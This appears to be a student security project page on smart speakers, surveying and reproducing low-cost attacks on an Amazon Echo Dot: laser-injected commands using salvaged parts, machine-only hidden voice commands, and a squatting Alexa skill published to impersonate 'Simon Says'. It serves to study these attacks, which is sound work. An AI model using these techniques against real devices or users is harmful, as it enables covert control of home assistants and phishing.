The Security and Privacy of Smart Speakers

Smart speaker, for example, Amazon Echo and Google Home, is a speaker with a voice-controlled intelligent virtual assistant that offers hands-free interactive actions. Unlike early voice-activatedtechnologies, which only work with a limited number of assigned commands, smart speakers are activated with a hot word and listen to a wide range of commands and questions after the hot word. This technology powered by natural language processing and machine learning provides excellent convenience to users daily lives, which contributes to the popularity of smart speakers; It is believed that 10% of the consumers around the world own a smart speaker. However, this great convenience also leads to a number of security and privacy issues. The most obvious concern is whether the smart speaker is always listening and recording user conversations, which can be maliciously used as a wiretap. This project aims to study the security and privacy issues associated with smart speakers, then provide a practical evaluation of existing attacks that can be done at a low cost.

Existing Attacks

  • Acoustic Attacks
    • Using inhouse bluetooth speaker to play recorded user instructions that controls the smart speaker
    • VSButton: uses the WiFi Technology to detect indoor human motions, only triggers the microphone when motion is detected, e.g. waving hands for 0.2m
  • Inaudible Attacks
    • Points a laser beam at the microphone which passes the recorded user instructions to the aser beam through a laser current driver
    • Physical blocks over microphone to block light beams, can be a half transparent plate or movable shutter
  • Skill Squatting Attacks
    • Register similar skills name to called the registered skill instead of the user targeted skill
    • Skill name must be unique, avoid similar names (e.g. only adding please before or after existing skill name)
  • Methodology

  • Target: Amazon Echo Dot
    • Affordable, popular, common
  • Attack 1: Light commands
    • Modify the light commands attack to use self built equipments to minimise the cost
    • Original cost: laser diode current driver (HKD 3000), headphone amplifier (HKD 200), laser diode (HKD 100)
  • Attack 2: Hidden voice commands
    • Generate obfuscated commands only recongisable by machines
    • Trail and error to modify MFC coefficients to maximise how obfuscated the command can be
  • Attack 3: Skill squatting attack
    • Create new skill similar to a legitimate one to hijack/impersonate voice commands
    • Utilise Alexa app card display to prove possibilty of more severe phishing attacks
  • Implementation

  • Attack 1: Light commands
    • Laser diode obtained from recycled PC DVD reader
    • Headphone amplifier and current driver can be built by own
    • Unstable for now (battery overheats that might cause fire, waiting for additional components to arrive)
  • Attack 2: Hidden voice commands
  • Attack 3: Skill squatting attack
    • Simon Says (legitimate: "simon says", impersonate: "the simon says game")
    • Proved to be used by users unintentionally (published to Alexa skill store)
    • Demo: firstly the legitimate skill, then the impersonated skill (designed not functionable to be distinguished easily here)
  • To Do

    To do completed in order

  • Oral examination
  • In Progress

    Final Report

  • Introduction
  • Background
  • Existing Attacks
  • Methodology and Design
  • Implementation
  • Evaluation
  • Conclusion
  • Done

    Completed as of 24 Jul

  • Literature review
  • Background information
  • Methodology
  • Implementation
  • Evaluation